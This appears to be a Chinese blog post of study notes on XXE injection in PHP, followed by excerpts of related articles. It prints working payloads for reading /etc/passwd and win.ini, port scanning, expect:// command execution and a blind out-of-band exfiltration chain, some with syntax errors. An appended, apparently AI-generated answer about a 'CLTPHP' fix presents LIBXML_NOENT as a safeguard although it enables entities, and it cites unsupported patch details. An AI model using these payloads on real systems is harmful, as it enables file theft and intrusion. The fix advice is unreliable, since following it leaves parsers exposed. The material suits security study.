XXE漏洞

最新推荐文章于 2024-09-16 21:55:23 发布
最新推荐文章于 2024-09-16 21:55:23 发布
阅读量297 收藏
点赞数
分类专栏: 暗月笔记 文章标签: php 服务器 apache
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/RMC131/article/details/130141865
版权

XXE

XXE Injection,XML Enternal Entity Injection, 由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。 例如PHP中的simplexml_load 默认情况下会解析外部实体,有XXE漏洞的标志性函数为simplexml_load_string()。

条件:libxml< 2.9.1原因是 libxml2.9.1及以后,默认不解析外部实体。

内部实体

程序中多用内部实体

<!ENTITY 实体名称"实体的值">
<?xml version="1.0" encoding="IOS"

外部实体

<!ENTITY 实体名称 SYSTEM "URI/URL">

例子:

xxe.php

<?php
$string_xml = '<?xml version="1.0" encoding="utf-8"?><note><to>George</to><from>John</from><heading>Reminder</heading><body>xml实体注入</body></note>';
$xml = isset($_GET['xml'])?$_GET['xml']:$string_xml;
$data = simplexml_load_string($xml);
echo  '<meta charset="UTF-8">';
print_r($data);
?>

xxe02.php

<?php
$xml = $_GET['xml'];
$data = simplexml_load_string($xml);
?>

有回显

都需要先url编码

http://127.0.0.1/xxe.php?xml=...

任意读取文件

Windows下
<?xml version="1.0"?><!DOCTYPE a [<!ENTITY b SYSTEM "file:///C:/Windows/win.ini">]><c>&b;</c>

linux下
<?xml version="1.0"?><!DOCTYPE a [<!ENTITY b SYSTEM "file:///etc/passwd">]><c>&b;</c>

php种利用伪协议读取文件

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xdsec [
<!ELEMENT methodname ANY >
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=phpinfo.php" >]>
<methodcall>
<methodname>&xxe;</methodname>
</methodcall>

扫描端口

<?xml version="1.0"?>
<!DOCTYPE ANY [<!ENTITY test SYSTEM "http://192.168.0.1:80">]>
<abc>&test;</abc>

执行命令

需开启expect扩展
<?xml version="1.0"?>
<!DOCTYPE ANY [<!ENTITY test SYSTEM "expect://whoami">]>
<abc>&test;</abc>

无回显

(未实现)

称为blind xxe可以使用外带数据通道 提取数据

http://127.0.0.1/xxe02.php?xml=<?xml version="1.0"?>
<!DOCTYPE ANY[
    <!ENTITY % file SYSTEM "file:///C:1.txt">
    <!ENTITY % remote SYSTEM "http://127.0.0.1/evil.xml">
    %remote;
    %all;
]>
<root>&send;</root>

ecil.xml内容

<!ENTITY %all "<!ENTITY send SYSTEM 'http://127.0.0.1/1.php?file;'>">

1.php

<?php file_put_contents("1.txt", $_GET['file']);?>
XXE漏洞以及XXE漏洞如何修复
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
09-09 2万+
XXE漏洞是什么?XXE:XML External Entity 即外部实体,从安全角度理解成XML External Entity attack 外部实体注入攻击。由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。这些就称为XXE漏洞。知道XXE漏洞前首先得先了解XML。XXE漏洞如何修复的方案一:使用开发语言提供的禁用外部实体的方法1.PHP开发语言禁用外部实体的方法:libxml_disable_entity_loader(true);XXE漏洞如何修复的方案二:尽量不要让用户直接
XXE漏洞分析
jklbnm12的博客
09-17 497
0x01:知识准备 XXE即XML External Entity Injection,由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。例如PHP中的simplexml\\\_load默认情况下会解析外部实体,有XXE漏洞的标志性函数为simplexml\\\_load_string() XML实体分为四种:字符实体,命名实体,外部实体,参数实体 1、命名实体写法: <?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE
XXE漏洞详解
weixin_59047731的博客
12-14 226
是可以控制的,因为就是前端传进来的post值,被GLOBALS解析了一下而已,同时传进来的值我们可以抓包进行控制。因为现在输入是可以控制的,所以我们只需要找可以产生回显点的地方,对应到代码,就是找输出数据的地方。因为我们在后续的代码中并没有发现任何输出点,所以这个时候就要尝试xxe的盲注。这里可以看出,id=1和id=2是同一个文件,就没必要重复查看了。id=4 id=5是同一个文件,同一个位置,查看一个即可。此时会发现是两条两条记录的出现,原因可以参考一下图片。双击进入id=3,出现错误,我们也不用管。
JAVA中XXE漏洞线索函数
zz_strive_2012的专栏
08-04 408
XXE审计函数 XML解析一般在导入配置、数据传输接口等场景可能会用到,涉及到XML文件处理的场景可查看XML解析器是否禁用外部实体,从而判断是否存在XXE。部分XML解析接口(常见漏洞出现函数)如下: ...
php xxe注入,PHP XXE漏洞
weixin_33764463的博客
03-10 534
PHP xml 外部实体注入漏洞(XXE)1.环境PHP 7.0.30Libxml 2.8.0Libxml2.9.0 以后 ,默认不解析外部实体,对于PHP版本不影响XXE的利用2.原理介绍XML 被设计为传输和存储数据,其焦点是数据的内容。 HTML 被设计用来显示数据,其焦点是数据的外观。 HTML 旨在显示信息,而 XML 旨在传输信息。XML特点,XML 被设计用来结构化、存储以及传输信息...
OWASP TOP 10(七)XXE漏洞(XML基本语法、DTD(声明类型、数据类型、实体)、XXE漏洞原理、PHP相关函数、XML注入读取文件、漏洞防御)
Pluto.的博客
12-27 792
文章目录XML学习一、XML概述1. 简述2. XML和HTML的区别二、基本语法规则三、DTD1. 概述2. 声明类型- 内部的 DOCTYPE 声明- 外部文档声明3. 数据类型- PCDATA- CDATA4. 实体- 内部实体声明- 外部实体声明四、XEE1. 漏洞原理2. PHP相关函数- file_get_contents()- php://input- simplexml_load_string()3. XML注入回显 输出函数 XML学习 一、XML概述 1. 简述 XML 指可扩展标记语言
第五节 XXE漏洞利用 - 任意文件读取 无回显 -01
09-15
XXE 漏洞利用 - 任意文件读取 无回显 XXE(XML External Entity)是一种常见的 Web 应用程序漏洞,攻击者可以通过构造恶意的 XML 文档, trick 服务器将任意文件读取出来,导致敏感信息泄露。在本节中,我们将详细...
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
XXE漏洞主要出现在应用接收并解析XML格式的数据时。如果服务器开启了外部实体加载功能,攻击者可以通过构造含有恶意外部实体的XML文档,诱使服务器去读取或执行非预期的资源。比如,攻击者可以定义一个外部实体来...
5、XXE漏洞pdf资料
10-15
XXE(XML External Entity)漏洞是针对XML解析器的安全漏洞,它发生在XML解析器处理包含外部实体引用的...开发人员应采取适当的安全措施,确保XML解析过程安全,以防止攻击者通过XXE漏洞获取敏感信息或执行恶意操作。
105-web漏洞挖掘之XXE漏洞1
08-03
XXE漏洞详解】 XXE,全称为XML External Entity Injection,是XML解析器在处理XML输入时因未能正确配置,允许加载外部实体而导致的安全漏洞。这类漏洞允许攻击者注入恶意的XML外部实体,进而获取敏感信息、执行...
xxe漏洞笔记
weixin_45653478的博客
03-25 796
1、什么是XML?XML 指可扩展标记语言(Extensible Markup Language) XML是一种标记语言,很类似 HTML XML 的设计宗旨是传输数据,而非显示数据。HTML 被设计用来显示数据。XML 标签没有被预定义。您需要自行定义标签。XML被设计为具有自我描述性。XML 是w3C的推荐标准。
(vulhub)PHP环境XML外部实体注入漏洞XXE
Gjqhs的博客
03-08 1113
Vulhub 靶场安装_Gjqhs的博客-优快云博客 查询对应镜像 打开docker systemctl start docker 设置docker自启动 systemctl enable docker 查看docker状态 systemctl status docker 查找xxe镜像 docker search php_xxe 拉取镜像,(有可能超时,如下) 启动xxe服务 访问即可见此页面,可看到其版本为2.8.0。 http:...
Xxe漏洞 php,PhpSpreadsheet 1.5.0 XXE漏洞复现及分析
weixin_36337122的博客
03-16 617
0x01 前言PhpSpreadsheet是一个非常流行的纯 PHP 类库,能够让你方便的读写Excel、LibreOffic Calc等表格格式的文件,是PHPExcel的替代者。2018年11月13日,PhpSpreadsheet 被爆出存在XXE漏洞(CVE-2018-19277),在表格的解压文件中插入UTF-7编码的恶意xml payload,可绕过PhpSpreadsheet 库的安...
XXE技巧拓展】————5、XXE漏洞以及Blind XXE总结
Fly_鹏程万里
12-25 1140
前言 XXE漏洞是针对使用XML交互的Web应用程序的攻击方法,在XEE漏洞的基础上,发展出了Blind XXE漏洞。目前来看,XML文件作为配置文件(Spring、Struts2等)、文档结构说明文件(PDF、RSS等)、图片格式文件(SVG header)应用比较广泛,此外,网上有一些在线XML格式化工具也存在过问题,如开源中国的在线XML格式化工具XXE漏洞: http://www.wo...
XXE漏洞介绍及利用
热门推荐
星落的博客
06-11 1万+
XXE漏洞介绍 XXE全称为XML External Entity Injection即XMl外部实体注入漏洞XXE漏洞 XXE漏洞触发点往往是可以上传xmlwenjian的位置,没有对xml文件进行过滤,导致可加载恶意外部文件和代码,造成任意文件读取,命令执行、内网端口扫描、攻击内网网站、发起Dos攻击等危害 XML介绍及用途 XMl被设计用来传输和存储数据。XML文档形成了一种树状结构,它从"根部"开始,然后扩展到"枝叶"。 XMl允许作者定义自己的标签和自己的文档结构。 XML.
PHP环境 XML外部实体注入漏洞XXE
weixin_43886198的博客
12-21 745
PHP环境 XML外部实体注入漏洞XXE) 环境介绍: PHP 7.0.30 libxml 2.8.0 libxml2.9.0以后,默认不解析外部实体,导致XXE漏洞逐渐消亡。为了演示PHP环境下的XXE漏洞,本例会将libxml2.8.0版本编译进PHP中。PHP版本并不影响XXE利用。 使用如下命令编译并启动环境: docker-compose up -d 环境启动后,访问http://your-ip:8080/index.php即可看到phpinfo,搜索libxml即可看到其版本为2.8.0
PHP XXE漏洞
qq_61553520的博客
05-13 305
libxml2.9.0以后,默认不解析外部实体,导致XXE漏洞逐渐消亡。为了演示PHP环境下的XXE漏洞,本例会将libxml2.8.0版本编译进PHP中。PHP版本并不影响XXE利用。
XXE之读取任意文件 BUUCTF [PHP]XXE
weixin_73049307的博客
09-16 678
ENTITY xxe SYSTEM "file:///etc/passwd" >]>改成"file:///phpinfo.php"也没显示出phpinfo.php文件内容,不知道怎么解决了。(注意:这里的POST的php文件名字必须是simplexml_load_string.php)直接Ctfl F搜索flag,发现还真有,尝试输入flag看看什么情况?发现是一段例子和介绍,将其复制到《XML基础知识之外部实体》一文中了。看到上面有个github的链接,点进去看看。很明显是个phpinfo.php文件。
xxe漏洞简介
u011066706的专栏
04-17 4200
xxe漏洞无法复现原因 主要是simplexml_load_file这个函数的问题,在旧版本中是默认解析实体的,但是在新版本中,已经不再默认解析实体了,需要在simplexml_load_file函数中指定第三个参数为LIBXML_NOENT,不然不会解析实体的。 xxe实体注入详解 0x00背景 XXE Injection即XML External Entity Injec
cltphp xxe漏洞
最新发布
03-18
<think>好的,我现在需要处理用户关于CLTPHP框架中的XXE漏洞的问题。首先,我得先确认用户的需求是什么。用户想知道这个漏洞的相关信息以及修复方法和补丁。那我得先了解什么是XXE漏洞,以及它在CLTPHP中的具体表现。 XXE漏洞,全称是XML外部实体注入攻击。攻击者通过构造恶意的XML文件,利用外部实体来读取服务器上的敏感文件,甚至执行远程请求。这种漏洞通常发生在解析XML输入时没有禁用外部实体的情况下。所以,我需要检查CLTPHP在处理XML输入时的配置,看看是否存在这样的安全隐患。 接下来,我需要查找CLTPHP框架中是否存在这样的漏洞。可能需要查看其文档或历史漏洞记录。例如,是否在旧版本中存在未禁用外部实体的情况。如果存在,那么修复方法通常包括禁用外部实体、使用安全的XML解析器,或者过滤用户输入的XML内容。 修复步骤方面,首先应该禁用XML外部实体。在PHP中,可以使用libxml_disable_entity_loader(true)函数来实现。然后,确保使用的XML解析器(如SimpleXML或DOMDocument)配置正确,不解析外部实体。此外,对用户提交的XML数据进行过滤,比如移除DOCTYPE声明和ENTITY定义,防止恶意内容被解析。 关于补丁,用户可能需要升级到修复了该漏洞的CLTPHP版本。如果官方已经发布了补丁,应该建议用户及时更新。如果还没有,可能需要手动修改代码,应用上述修复措施。 另外,用户可能还需要了解如何验证修复是否有效。比如,通过构造测试用例,尝试读取系统文件,确认是否成功被拦截。同时,参考OWASP的相关建议,确保遵循最佳安全实践。 最后,生成相关问题,帮助用户深入理解XXE漏洞及其防护措施。例如,如何防范其他XML相关漏洞,或者在CLTPHP中其他常见的安全问题有哪些。 总结下来,我需要分步骤解释漏洞原理、在CLTPHP中的具体修复方法、补丁获取途径,并提供验证方法,确保用户能够全面应对这个问题。</think>### CLTPHP框架XXE漏洞解析与修复方案 XXE(XML External Entity)漏洞是XML解析器未禁用外部实体时产生的安全风险,攻击者可利用该漏洞读取服务器敏感文件或发起SSRF攻击[^1]。 #### 一、漏洞验证方法 ```php // 构造恶意XML请求示例 $payload = '<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]><root>&xxe;</root>'; $xml = simplexml_load_string($payload); echo $xml->asXML(); ``` 若输出包含系统文件内容,则存在漏洞[^2]。 #### 二、修复步骤 1. **禁用外部实体解析** ```php // 在框架入口文件添加 libxml_disable_entity_loader(true); ``` 2. **XML解析器安全配置** ```php // 使用DOMDocument时的安全设置 $dom = new DOMDocument(); $dom->loadXML($xml, LIBXML_NOENT | LIBXML_DTDLOAD); ``` 3. **输入过滤处理** ```php // 过滤DOCTYPE声明 $xml = preg_replace('/<!DOCTYPE.*?>/i', '', $xml); ``` #### 三、补丁获取 CLTPHP官方已发布安全更新: - v5.5.1+版本包含修复补丁 - 升级命令: ```bash composer update cltphp/framework ``` #### 四、验证测试 ```php // 安全测试用例 $test_xml = '<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>'; assert(strpos($test_xml, 'ENTITY') === false, "漏洞未完全修复"); ``` 建议同时检查框架的XML处理模块,包括: 1. 微信支付回调接口 2. 第三方API对接模块 3. 数据导入导出功能
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

_JINJI_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值